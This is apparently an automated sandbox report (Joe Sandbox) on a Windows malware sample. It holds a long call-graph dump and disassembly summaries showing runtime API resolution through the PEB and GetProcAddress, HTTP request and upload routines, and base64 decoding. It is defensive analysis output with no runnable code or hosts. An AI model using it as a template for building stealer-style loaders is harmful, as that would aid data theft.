26295 d63e13 26294->26295 26296 d64a60 2 API calls 26295->26296 26297 d63e29 26296->26297 26298 d64a60 2 API calls 26297->26298 26299 d63e3f 26298->26299 26300 d64a60 2 API calls 26299->26300 26301 d63e55 26300->26301 26302 d64a60 2 API calls 26301->26302 26303 d63e6e 26302->26303 26304 d64a60 2 API calls 26303->26304 26305 d63e84 26304->26305 26306 d64a60 2 API calls 26305->26306 26307 d63e9a 26306->26307 26308 d64a60 2 API calls 26307->26308 26309 d63eb0 26308->26309 26310 d64a60 2 API calls 26309->26310 26311 d63ec6 26310->26311 26312 d64a60 2 API calls 26311->26312 26313 d63edc 26312->26313 26314 d64a60 2 API calls 26313->26314 26315 d63ef5 26314->26315 26316 d64a60 2 API calls 26315->26316 26317 d63f0b 26316->26317 26318 d64a60 2 API calls 26317->26318 26319 d63f21 26318->26319 26320 d64a60 2 API calls 26319->26320 26321 d63f37 26320->26321 26322 d64a60 2 API calls 26321->26322 26323 d63f4d 26322->26323 26324 d64a60 2 API calls 26323->26324 26325 d63f63 26324->26325 26326 d64a60 2 API calls 26325->26326 26327 d63f7c 26326->26327 26328 d64a60 2 API calls 26327->26328 26329 d63f92 26328->26329 26330 d64a60 2 API calls 26329->26330 26331 d63fa8 26330->26331 26332 d64a60 2 API calls 26331->26332 26333 d63fbe 26332->26333 26334 d64a60 2 API calls 26333->26334 26335 d63fd4 26334->26335 26336 d64a60 2 API calls 26335->26336 26337 d63fea 26336->26337 26338 d64a60 2 API calls 26337->26338 26339 d64003 26338->26339 26340 d64a60 2 API calls 26339->26340 26341 d64019 26340->26341 26342 d64a60 2 API calls 26341->26342 26343 d6402f 26342->26343 26344 d64a60 2 API calls 26343->26344 26345 d64045 26344->26345 26346 d64a60 2 API calls 26345->26346 26347 d6405b 26346->26347 26348 d64a60 2 API calls 26347->26348 26349 d64071 26348->26349 26350 d64a60 2 API calls 26349->26350 26351 d6408a 26350->26351 26352 d64a60 2 API calls 26351->26352 26353 d640a0 26352->26353 26354 d64a60 2 API calls 26353->26354 26355 d640b6 26354->26355 26356 d64a60 2 API calls 26355->26356 26357 d640cc 26356->26357 26358 d64a60 2 API calls 26357->26358 26359 d640e2 26358->26359 26360 d64a60 2 API calls 26359->26360 26361 d640f8 26360->26361 26362 d64a60 2 API calls 26361->26362 26363 d64111 26362->26363 26364 d64a60 2 API calls 26363->26364 26365 d64127 26364->26365 26366 d64a60 2 API calls 26365->26366 26367 d6413d 26366->26367 26368 d64a60 2 API calls 26367->26368 26369 d64153 26368->26369 26370 d64a60 2 API calls 26369->26370 26371 d64169 26370->26371 26372 d64a60 2 API calls 26371->26372 26373 d6417f 26372->26373 26374 d64a60 2 API calls 26373->26374 26375 d64198 26374->26375 26376 d64a60 2 API calls 26375->26376 26377 d641ae 26376->26377 26378 d64a60 2 API calls 26377->26378 26379 d641c4 26378->26379 26380 d64a60 2 API calls 26379->26380 26381 d641da 26380->26381 26382 d64a60 2 API calls 26381->26382 26383 d641f0 26382->26383 26384 d64a60 2 API calls 26383->26384 26385 d64206 26384->26385 26386 d64a60 2 API calls 26385->26386 26387 d6421f 26386->26387 26388 d64a60 2 API calls 26387->26388 26389 d64235 26388->26389 26390 d64a60 2 API calls 26389->26390 26391 d6424b 26390->26391 26392 d64a60 2 API calls 26391->26392 26393 d64261 26392->26393 26394 d64a60 2 API calls 26393->26394 26395 d64277 26394->26395 26396 d64a60 2 API calls 26395->26396 26397 d6428d 26396->26397 26398 d64a60 2 API calls 26397->26398 26399 d642a6 26398->26399 26400 d64a60 2 API calls 26399->26400 26401 d642bc 26400->26401 26402 d64a60 2 API calls 26401->26402 26403 d642d2 26402->26403 26404 d64a60 2 API calls 26403->26404 26405 d642e8 26404->26405 26406 d64a60 2 API calls 26405->26406 26407 d642fe 26406->26407 26408 d64a60 2 API calls 26407->26408 26409 d64314 26408->26409 26410 d64a60 2 API calls 26409->26410 26411 d6432d 26410->26411 26412 d64a60 2 API calls 26411->26412 26413 d64343 26412->26413 26414 d64a60 2 API calls 26413->26414 26415 d64359 26414->26415 26416 d64a60 2 API calls 26415->26416 26417 d6436f 26416->26417 26418 d64a60 2 API calls 26417->26418 26419 d64385 26418->26419 26420 d64a60 2 API calls 26419->26420 26421 d6439b 26420->26421 26422 d64a60 2 API calls 26421->26422 26423 d643b4 26422->26423 26424 d64a60 2 API calls 26423->26424 26425 d643ca 26424->26425 26426 d64a60 2 API calls 26425->26426 26427 d643e0 26426->26427 26428 d64a60 2 API calls 26427->26428 26429 d643f6 26428->26429 26430 d64a60 2 API calls 26429->26430 26431 d6440c 26430->26431 26432 d64a60 2 API calls 26431->26432 26433 d64422 26432->26433 26434 d64a60 2 API calls 26433->26434 26435 d6443b 26434->26435 26436 d64a60 2 API calls 26435->26436 26437 d64451 26436->26437 26438 d64a60 2 API calls 26437->26438 26439 d64467 26438->26439 26440 d64a60 2 API calls 26439->26440 26441 d6447d 26440->26441 26442 d64a60 2 API calls 26441->26442 26443 d64493 26442->26443 26444 d64a60 2 API calls 26443->26444 26445 d644a9 26444->26445 26446 d64a60 2 API calls 26445->26446 26447 d644c2 26446->26447 26448 d64a60 2 API calls 26447->26448 26449 d644d8 26448->26449 26450 d64a60 2 API calls 26449->26450 26451 d644ee 26450->26451 26452 d64a60 2 API calls 26451->26452 26453 d64504 26452->26453 26454 d64a60 2 API calls 26453->26454 26455 d6451a 26454->26455 26456 d64a60 2 API calls 26455->26456 26457 d64530 26456->26457 26458 d64a60 2 API calls 26457->26458 26459 d64549 26458->26459 26460 d64a60 2 API calls 26459->26460 26461 d6455f 26460->26461 26462 d64a60 2 API calls 26461->26462 26463 d64575 26462->26463 26464 d64a60 2 API calls 26463->26464 26465 d6458b 26464->26465 26466 d64a60 2 API calls 26465->26466 26467 d645a1 26466->26467 26468 d64a60 2 API calls 26467->26468 26469 d645b7 26468->26469 26470 d64a60 2 API calls 26469->26470 26471 d645d0 26470->26471 26472 d64a60 2 API calls 26471->26472 26473 d645e6 26472->26473 26474 d64a60 2 API calls 26473->26474 26475 d645fc 26474->26475 26476 d64a60 2 API calls 26475->26476 26477 d64612 26476->26477 26478 d64a60 2 API calls 26477->26478 26479 d64628 26478->26479 26480 d64a60 2 API calls 26479->26480 26481 d6463e 26480->26481 26482 d64a60 2 API calls 26481->26482 26483 d64657 26482->26483 26484 d64a60 2 API calls 26483->26484 26485 d6466d 26484->26485 26486 d64a60 2 API calls 26485->26486 26487 d64683 26486->26487 26488 d64a60 2 API calls 26487->26488 26489 d64699 26488->26489 26490 d64a60 2 API calls 26489->26490 26491 d646af 26490->26491 26492 d64a60 2 API calls 26491->26492 26493 d646c5 26492->26493 26494 d64a60 2 API calls 26493->26494 26495 d646de 26494->26495 26496 d64a60 2 API calls 26495->26496 26497 d646f4 26496->26497 26498 d64a60 2 API calls 26497->26498 26499 d6470a 26498->26499 26500 d64a60 2 API calls 26499->26500 26501 d64720 26500->26501 26502 d64a60 2 API calls 26501->26502 26503 d64736 26502->26503 26504 d64a60 2 API calls 26503->26504 26505 d6474c 26504->26505 26506 d64a60 2 API calls 26505->26506 26507 d64765 26506->26507 26508 d64a60 2 API calls 26507->26508 26509 d6477b 26508->26509 26510 d64a60 2 API calls 26509->26510 26511 d64791 26510->26511 26512 d64a60 2 API calls 26511->26512 26513 d647a7 26512->26513 26514 d64a60 2 API calls 26513->26514 26515 d647bd 26514->26515 26516 d64a60 2 API calls 26515->26516 26517 d647d3 26516->26517 26518 d64a60 2 API calls 26517->26518 26519 d647ec 26518->26519 26520 d64a60 2 API calls 26519->26520 26521 d64802 26520->26521 26522 d64a60 2 API calls 26521->26522 26523 d64818 26522->26523 26524 d64a60 2 API calls 26523->26524 26525 d6482e 26524->26525 26526 d64a60 2 API calls 26525->26526 26527 d64844 26526->26527 26528 d64a60 2 API calls 26527->26528 26529 d6485a 26528->26529 26530 d64a60 2 API calls 26529->26530 26531 d64873 26530->26531 26532 d64a60 2 API calls 26531->26532 26533 d64889 26532->26533 26534 d64a60 2 API calls 26533->26534 26535 d6489f 26534->26535 26536 d64a60 2 API calls 26535->26536 26537 d648b5 26536->26537 26538 d64a60 2 API calls 26537->26538 26539 d648cb 26538->26539 26540 d64a60 2 API calls 26539->26540 26541 d648e1 26540->26541 26542 d64a60 2 API calls 26541->26542 26543 d648fa 26542->26543 26544 d64a60 2 API calls 26543->26544 26545 d64910 26544->26545 26546 d64a60 2 API calls 26545->26546 26547 d64926 26546->26547 26548 d64a60 2 API calls 26547->26548 26549 d6493c 26548->26549 26550 d64a60 2 API calls 26549->26550 26551 d64952 26550->26551 26552 d64a60 2 API calls 26551->26552 26553 d64968 26552->26553 26554 d64a60 2 API calls 26553->26554 26555 d64981 26554->26555 26556 d64a60 2 API calls 26555->26556 26557 d64997 26556->26557 26558 d64a60 2 API calls 26557->26558 26559 d649ad 26558->26559 26560 d64a60 2 API calls 26559->26560 26561 d649c3 26560->26561 26562 d64a60 2 API calls 26561->26562 26563 d649d9 26562->26563 26564 d64a60 2 API calls 26563->26564 26565 d649ef 26564->26565 26566 d64a60 2 API calls 26565->26566 26567 d64a08 26566->26567 26568 d64a60 2 API calls 26567->26568 26569 d64a1e 26568->26569 26570 d64a60 2 API calls 26569->26570 26571 d64a34 26570->26571 26572 d64a60 2 API calls 26571->26572 26573 d64a4a 26572->26573 26574 d866e0 26573->26574 26575 d866ed 43 API calls 26574->26575 26576 d86afe 8 API calls 26574->26576 26575->26576 26577 d86c08 26576->26577 26578 d86b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26576->26578 26579 d86cd2 26577->26579 26580 d86c15 8 API calls 26577->26580 26578->26577 26581 d86cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26579->26581 26582 d86d4f 26579->26582 26580->26579 26581->26582 26583 d86de9 26582->26583 26584 d86d5c 6 API calls 26582->26584 26585 d86f10 26583->26585 26586 d86df6 12 API calls 26583->26586 26584->26583 26587 d86f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26585->26587 26588 d86f8d 26585->26588 26586->26585 26587->26588 26589 d86fc1 26588->26589 26590 d86f96 GetProcAddress GetProcAddress 26588->26590 26591 d86fca GetProcAddress GetProcAddress 26589->26591 26592 d86ff5 26589->26592 26590->26589 26591->26592 26593 d870ed 26592->26593 26594 d87002 10 API calls 26592->26594 26595 d87152 26593->26595 26596 d870f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26593->26596 26594->26593 26597 d8715b GetProcAddress 26595->26597 26598 d8716e 26595->26598 26596->26595 26597->26598 26599 d8051f 26598->26599 26600 d87177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26598->26600 26601 d61530 26599->26601 26600->26599 26910 d61610 26601->26910 26603 d6153b 26604 d61555 lstrcpy 26603->26604 26605 d6155d 26603->26605 26604->26605 26606 d6157f 26605->26606 26607 d61577 lstrcpy 26605->26607 26608 d61599 lstrcpy 26606->26608 26609 d615a1 26606->26609 26607->26606 26608->26609 26610 d61605 26609->26610 26611 d615fd lstrcpy 26609->26611 26612 d7f1b0 lstrlen 26610->26612 26611->26610 26613 d7f1e4 26612->26613 26614 d7f1f7 lstrlen 26613->26614 26615 d7f1eb lstrcpy 26613->26615 26616 d7f208 26614->26616 26615->26614 26617 d7f20f lstrcpy 26616->26617 26618 d7f21b lstrlen 26616->26618 26617->26618 26619 d7f22c 26618->26619 26620 d7f233 lstrcpy 26619->26620 26621 d7f23f 26619->26621 26620->26621 26622 d7f258 lstrcpy 26621->26622 26623 d7f264 26621->26623 26622->26623 26624 d7f286 lstrcpy 26623->26624 26625 d7f292 26623->26625 26624->26625 26626 d7f2ba lstrcpy 26625->26626 26627 d7f2c6 26625->26627 26626->26627 26628 d7f2ea lstrcpy 26627->26628 26634 d7f300 26627->26634 26628->26634 26629 d7f30c lstrlen 26629->26634 26630 d7f4b9 lstrcpy 26630->26634 26631 d7f3a1 lstrcpy 26631->26634 26632 d7f4e8 lstrcpy 26694 d7f4f0 26632->26694 26633 d7f3c5 lstrcpy 26633->26634 26634->26629 26634->26630 26634->26631 26634->26632 26634->26633 26635 d7f479 lstrcpy 26634->26635 26637 d7f70f StrCmpCA 26634->26637 26640 d7fa29 StrCmpCA 26634->26640 26641 d7f73e lstrlen 26634->26641 26642 d7fd4d StrCmpCA 26634->26642 26647 d7fa58 lstrlen 26634->26647 26651 d7f89e lstrcpy 26634->26651 26658 d7f76f lstrcpy 26634->26658 26659 d7fbb8 lstrcpy 26634->26659 26662 d7fa89 lstrcpy 26634->26662 26665 d7f791 lstrcpy 26634->26665 26667 d61530 8 API calls 26634->26667 26668 d7f8cd lstrcpy 26634->26668 26672 d7faab lstrcpy 26634->26672 26675 d7fbe7 lstrcpy 26634->26675 26678 d7ee90 28 API calls 26634->26678 26684 d7f7e2 lstrcpy 26634->26684 26687 d7fafc lstrcpy 26634->26687 26634->26694 26635->26634 26636 d7f59c lstrcpy 26636->26694 26637->26634 26639 d7fe8e 26637->26639 26638 d7f616 StrCmpCA 26638->26637 26638->26694 26644 d7fead lstrlen 26639->26644 26645 d7fea5 lstrcpy 26639->26645 26640->26634 26643 d7fe2b 26640->26643 26641->26634 26646 d7fd60 Sleep 26642->26646 26657 d7fd75 26642->26657 26650 d7fe4a lstrlen 26643->26650 26652 d7fe42 lstrcpy 26643->26652 26649 d7fec7 26644->26649 26645->26644 26646->26634 26647->26634 26648 d7f64a lstrcpy 26648->26694 26655 d7fee7 lstrlen 26649->26655 26660 d7fedf lstrcpy 26649->26660 26654 d7fe64 26650->26654 26651->26634 26652->26650 26653 d7ee90 28 API calls 26653->26694 26663 d7fdce lstrlen 26654->26663 26664 d7fe7c lstrcpy 26654->26664 26670 d7ff01 26655->26670 26656 d7fd94 lstrlen 26669 d7fdae 26656->26669 26657->26656 26661 d7fd8c lstrcpy 26657->26661 26658->26634 26659->26634 26660->26655 26661->26656 26662->26634 26679 d7fde8 26663->26679 26664->26663 26665->26634 26667->26634 26668->26694 26669->26663 26674 d7fdc6 lstrcpy 26669->26674 26671 d7ff21 26670->26671 26676 d7ff19 lstrcpy 26670->26676 26677 d61610 4 API calls 26671->26677 26672->26634 26673 d7f698 lstrcpy 26673->26694 26674->26663 26675->26694 26676->26671 26696 d7fe13 26677->26696 26678->26634 26680 d7fe08 26679->26680 26682 d7fe00 lstrcpy 26679->26682 26683 d61610 4 API calls 26680->26683 26681 d7efb0 35 API calls 26681->26694 26682->26680 26683->26696 26684->26634 26685 d7f924 lstrcpy 26685->26694 26686 d7f99e StrCmpCA 26686->26640 26686->26694 26687->26634 26688 d7fc3e lstrcpy 26688->26694 26689 d7fcb8 StrCmpCA 26689->26642 26689->26694 26690 d7f9cb lstrcpy 26690->26694 26691 d61530 8 API calls 26691->26694 26692 d7fce9 lstrcpy 26692->26694 26693 d7fa19 lstrcpy 26693->26694 26694->26634 26694->26636 26694->26638 26694->26640 26694->26642 26694->26648 26694->26653 26694->26673 26694->26681 26694->26685 26694->26686 26694->26688 26694->26689 26694->26690 26694->26691 26694->26692 26694->26693 26695 d7fd3a lstrcpy 26694->26695 26695->26694 26696->25720 26698 d8278c GetVolumeInformationA 26697->26698 26699 d82785 26697->26699 26700 d827ec GetProcessHeap RtlAllocateHeap 26698->26700 26699->26698 26702 d82822 26700->26702 26703 d82826 wsprintfA 26700->26703 26920 d871e0 26702->26920 26703->26702 26707 d64c70 26706->26707 26708 d64c85 26707->26708 26710 d64c7d lstrcpy 26707->26710 26924 d64bc0 26708->26924 26710->26708 26711 d64c90 26712 d64ccc lstrcpy 26711->26712 26713 d64cd8 26711->26713 26712->26713 26714 d64cff lstrcpy 26713->26714 26715 d64d0b 26713->26715 26714->26715 26716 d64d2f lstrcpy 26715->26716 26717 d64d3b 26715->26717 26716->26717 26718 d64d6d lstrcpy 26717->26718 26719 d64d79 26717->26719 26718->26719 26720 d64da0 lstrcpy 26719->26720 26721 d64dac InternetOpenA StrCmpCA 26719->26721 26720->26721 26722 d64de0 26721->26722 26723 d654b8 InternetCloseHandle CryptStringToBinaryA 26722->26723 26928 d83e70 26722->26928 26724 d654e8 LocalAlloc 26723->26724 26741 d655d8 26723->26741 26726 d654ff CryptStringToBinaryA 26724->26726 26724->26741 26727 d65517 LocalFree 26726->26727 26728 d65529 lstrlen 26726->26728 26727->26741 26729 d6553d 26728->26729 26731 d65557 lstrcpy 26729->26731 26732 d65563 lstrlen 26729->26732 26730 d64dfa 26733 d64e23 lstrcpy lstrcat 26730->26733 26734 d64e38 26730->26734 26731->26732 26736 d6557d 26732->26736 26733->26734 26735 d64e5a lstrcpy 26734->26735 26738 d64e62 26734->26738 26735->26738 26737 d6558f lstrcpy lstrcat 26736->26737 26739 d655a2 26736->26739 26737->26739 26740 d64e71 lstrlen 26738->26740 26742 d655d1 26739->26742 26744 d655c9 lstrcpy 26739->26744 26743 d64e89 26740->26743 26741->25749 26742->26741 26745 d64e95 lstrcpy lstrcat 26743->26745 26746 d64eac 26743->26746 26744->26742 26745->26746 26747 d64ed5 26746->26747 26748 d64ecd lstrcpy 26746->26748 26749 d64edc lstrlen 26747->26749 26748->26747 26750 d64ef2 26749->26750 26751 d64efe lstrcpy lstrcat 26750->26751 26752 d64f15 26750->26752 26751->26752 26753 d64f36 lstrcpy 26752->26753 26754 d64f3e 26752->26754 26753->26754 26755 d64f65 lstrcpy lstrcat 26754->26755 26756 d64f7b 26754->26756 26755->26756 26757 d64f9c lstrcpy 26756->26757 26758 d64fa4 26756->26758 26757->26758 26759 d64fab lstrlen 26758->26759 26760 d64fc1 26759->26760 26761 d64fcd lstrcpy lstrcat 26760->26761 26762 d64fe4 26760->26762 26761->26762 26763 d6500d 26762->26763 26764 d65005 lstrcpy 26762->26764 26765 d65014 lstrlen 26763->26765 26764->26763 26766 d6502a 26765->26766 26767 d65036 lstrcpy lstrcat 26766->26767 26768 d6504d 26766->26768 26767->26768 26769 d65079 26768->26769 26770 d65071 lstrcpy 26768->26770 26771 d65080 lstrlen 26769->26771 26770->26769 26772 d6509b 26771->26772 26773 d650ac lstrcpy lstrcat 26772->26773 26774 d650bc 26772->26774 26773->26774 26775 d650da lstrcpy lstrcat 26774->26775 26776 d650ed 26774->26776 26775->26776 26777 d6510b lstrcpy 26776->26777 26778 d65113 26776->26778 26777->26778 26779 d65121 InternetConnectA 26778->26779 26779->26723 26780 d65150 HttpOpenRequestA 26779->26780 26781 d654b1 InternetCloseHandle 26780->26781 26782 d6518b 26780->26782 26781->26723 26935 d87310 lstrlen 26782->26935 26786 d651a4 26943 d872c0 26786->26943 26789 d87280 lstrcpy 26790 d651c0 26789->26790 26791 d87310 3 API calls 26790->26791 26792 d651d5 26791->26792 26793 d87280 lstrcpy 26792->26793 26794 d651de 26793->26794 26795 d87310 3 API calls 26794->26795 26796 d651f4 26795->26796 26797 d87280 lstrcpy 26796->26797 26798 d651fd 26797->26798 26799 d87310 3 API calls 26798->26799 26800 d65213 26799->26800 26801 d87280 lstrcpy 26800->26801 26802 d6521c 26801->26802 26803 d87310 3 API calls 26802->26803 26804 d65231 26803->26804 26805 d87280 lstrcpy 26804->26805 26806 d6523a 26805->26806 26807 d872c0 2 API calls 26806->26807 26808 d6524d 26807->26808 26809 d87280 lstrcpy 26808->26809 26810 d65256 26809->26810 26811 d87310 3 API calls 26810->26811 26812 d6526b 26811->26812 26813 d87280 lstrcpy 26812->26813 26814 d65274 26813->26814 26815 d87310 3 API calls 26814->26815 26816 d65289 26815->26816 26817 d87280 lstrcpy 26816->26817 26818 d65292 26817->26818 26819 d872c0 2 API calls 26818->26819 26820 d652a5 26819->26820 26821 d87280 lstrcpy 26820->26821 26822 d652ae 26821->26822 26823 d87310 3 API calls 26822->26823 26824 d652c3 26823->26824 26825 d87280 lstrcpy 26824->26825 26826 d652cc 26825->26826 26827 d87310 3 API calls 26826->26827 26828 d652e2 26827->26828 26829 d87280 lstrcpy 26828->26829 26830 d652eb 26829->26830 26831 d87310 3 API calls 26830->26831 26832 d65301 26831->26832 26833 d87280 lstrcpy 26832->26833 26834 d6530a 26833->26834 26835 d87310 3 API calls 26834->26835 26836 d6531f 26835->26836 26837 d87280 lstrcpy 26836->26837 26838 d65328 26837->26838 26839 d872c0 2 API calls 26838->26839 26840 d6533b 26839->26840 26841 d87280 lstrcpy 26840->26841 26842 d65344 26841->26842 26843 d65370 lstrcpy 26842->26843 26844 d6537c 26842->26844 26843->26844 26845 d872c0 2 API calls 26844->26845 26846 d6538a 26845->26846 26847 d872c0 2 API calls 26846->26847 26848 d65397 26847->26848 26849 d87280 lstrcpy 26848->26849 26850 d653a1 26849->26850 26851 d653b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26850->26851 26852 d6549c InternetCloseHandle 26851->26852 26856 d653f2 26851->26856 26854 d654ae 26852->26854 26853 d653fd lstrlen 26853->26856 26854->26781 26855 d6542e lstrcpy lstrcat 26855->26856 26856->26852 26856->26853 26856->26855 26857 d65473 26856->26857 26858 d6546b lstrcpy 26856->26858 26859 d6547a InternetReadFile 26857->26859 26858->26857 26859->26852 26859->26856 26861 d78cc6 ExitProcess 26860->26861 26862 d78ccd 26860->26862 26863 d78ee2 26862->26863 26864 d78e56 StrCmpCA 26862->26864 26865 d78d30 lstrlen 26862->26865 26866 d78dbd StrCmpCA 26862->26866 26867 d78ddd StrCmpCA 26862->26867 26868 d78dfd StrCmpCA 26862->26868 26869 d78e1d StrCmpCA 26862->26869 26870 d78e3d StrCmpCA 26862->26870 26871 d78d5a lstrlen 26862->26871 26872 d78d06 lstrlen 26862->26872 26873 d78d84 StrCmpCA 26862->26873 26874 d78da4 StrCmpCA 26862->26874 26875 d78e6f StrCmpCA 26862->26875 26876 d78e88 lstrlen 26862->26876 26877 d78ebb lstrcpy 26862->26877 26863->25751 26864->26862 26865->26862 26866->26862 26867->26862 26868->26862 26869->26862 26870->26862 26871->26862 26872->26862 26873->26862 26874->26862 26875->26862 26876->26862 26877->26862 26878->25757 26879->25759 26880->25765 26881->25767 26882->25773 26883->25775 26884->25781 26885->25785 26886->25791 26887->25793 26888->25797 26889->25811 26890->25815 26891->25814 26892->25810 26893->25814 26894->25829 26895->25817 26896->25818 26897->25822 26898->25825 26899->25831 26900->25837 26901->25840 26902->25847 26903->25868 26904->25872 26905->25871 26906->25867 26907->25871 26908->25881 26911 d6161f 26910->26911 26912 d6162b lstrcpy 26911->26912 26913 d61633 26911->26913 26912->26913 26914 d6164d lstrcpy 26913->26914 26915 d61655 26913->26915 26914->26915 26916 d6166f lstrcpy 26915->26916 26917 d61677 26915->26917 26916->26917 26918 d61699 26917->26918 26919 d61691 lstrcpy 26917->26919 26918->26603 26919->26918 26921 d871e6 26920->26921 26922 d871fc lstrcpy 26921->26922 26923 d82860 26921->26923 26922->26923 26923->25746 26925 d64bd0 26924->26925 26925->26925 26926 d64bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26925->26926 26927 d64c41 26926->26927 26927->26711 26929 d83e83 26928->26929 26930 d83e9f lstrcpy 26929->26930 26931 d83eab 26929->26931 26930->26931 26932 d83ecd lstrcpy 26931->26932 26933 d83ed5 GetSystemTime 26931->26933 26932->26933 26934 d83ef3 26933->26934 26934->26730 26937 d8732d 26935->26937 26936 d6519b 26939 d87280 26936->26939 26937->26936 26938 d8733d lstrcpy lstrcat 26937->26938 26938->26936 26941 d8728c 26939->26941 26940 d872b4 26940->26786 26941->26940 26942 d872ac lstrcpy 26941->26942 26942->26940 26945 d872dc 26943->26945 26944 d651b7 26944->26789 26945->26944 26946 d872ed lstrcpy lstrcat 26945->26946 26946->26944

                            Executed Functions

                            Function 00D64C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D64C7F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64CD2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64D05
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64D35
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64D73
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D64DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D64DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: b3961c5f6133f7c5dce6e6d9e65e99314f8b242108adf70187b4d031f39a32ab
                            • Instruction ID: cdb91444994dc9deb09d191a4677b91de239be6673e9fdc4a5bdd02ff5c0ec59
                            • Opcode Fuzzy Hash: b3961c5f6133f7c5dce6e6d9e65e99314f8b242108adf70187b4d031f39a32ab
                            • Instruction Fuzzy Hash: 12529C3191161A9BDB21EFB4DC49BAE77B9EF44300F194029F905EB251DB74ED428BB0
                            Function 00D86390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2125 d86390-d863bd GetPEB 2126 d865c3-d86623 LoadLibraryA * 5 2125->2126 2127 d863c3-d865be call d862f0 GetProcAddress * 20 2125->2127 2128 d86638-d8663f 2126->2128 2129 d86625-d86633 GetProcAddress 2126->2129 2127->2126 2131 d8666c-d86673 2128->2131 2132 d86641-d86667 GetProcAddress * 2 2128->2132 2129->2128 2134 d86688-d8668f 2131->2134 2135 d86675-d86683 GetProcAddress 2131->2135 2132->2131 2136 d86691-d8669f GetProcAddress 2134->2136 2137 d866a4-d866ab 2134->2137 2135->2134 2136->2137 2139 d866ad-d866d2 GetProcAddress * 2 2137->2139 2140 d866d7-d866da 2137->2140 2139->2140
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00BF2130), ref: 00D863E9
                            • GetProcAddress.KERNEL32(74DD0000,00BF20B8), ref: 00D86402
                            • GetProcAddress.KERNEL32(74DD0000,00BF20D0), ref: 00D8641A
                            • GetProcAddress.KERNEL32(74DD0000,00BF21D8), ref: 00D86432
                            • GetProcAddress.KERNEL32(74DD0000,00BF8D30), ref: 00D8644B
                            • GetProcAddress.KERNEL32(74DD0000,00BE6330), ref: 00D86463
                            • GetProcAddress.KERNEL32(74DD0000,00BE62D0), ref: 00D8647B
                            • GetProcAddress.KERNEL32(74DD0000,00BF2160), ref: 00D86494
                            • GetProcAddress.KERNEL32(74DD0000,00BF21F0), ref: 00D864AC
                            • GetProcAddress.KERNEL32(74DD0000,00BF2190), ref: 00D864C4
                            • GetProcAddress.KERNEL32(74DD0000,00BF2280), ref: 00D864DD
                            • GetProcAddress.KERNEL32(74DD0000,00BE6150), ref: 00D864F5
                            • GetProcAddress.KERNEL32(74DD0000,00BF2178), ref: 00D8650D
                            • GetProcAddress.KERNEL32(74DD0000,00BF2208), ref: 00D86526
                            • GetProcAddress.KERNEL32(74DD0000,00BE62F0), ref: 00D8653E
                            • GetProcAddress.KERNEL32(74DD0000,00BF2220), ref: 00D86556
                            • GetProcAddress.KERNEL32(74DD0000,00BF2238), ref: 00D8656F
                            • GetProcAddress.KERNEL32(74DD0000,00BE6190), ref: 00D86587
                            • GetProcAddress.KERNEL32(74DD0000,00BF2100), ref: 00D8659F
                            • GetProcAddress.KERNEL32(74DD0000,00BE6110), ref: 00D865B8
                            • LoadLibraryA.KERNEL32(00BF2328,?,?,?,00D81C03), ref: 00D865C9
                            • LoadLibraryA.KERNEL32(00BF2358,?,?,?,00D81C03), ref: 00D865DB
                            • LoadLibraryA.KERNEL32(00BF2370,?,?,?,00D81C03), ref: 00D865ED
